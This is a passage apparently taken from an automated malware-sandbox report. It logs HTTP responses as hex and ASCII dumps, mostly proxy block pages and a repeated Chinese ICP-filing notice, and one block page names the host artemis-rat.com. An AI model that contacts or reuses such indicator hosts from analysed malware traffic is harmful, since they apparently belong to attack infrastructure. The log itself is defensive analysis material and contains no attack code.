3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3938X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:43 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:43 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 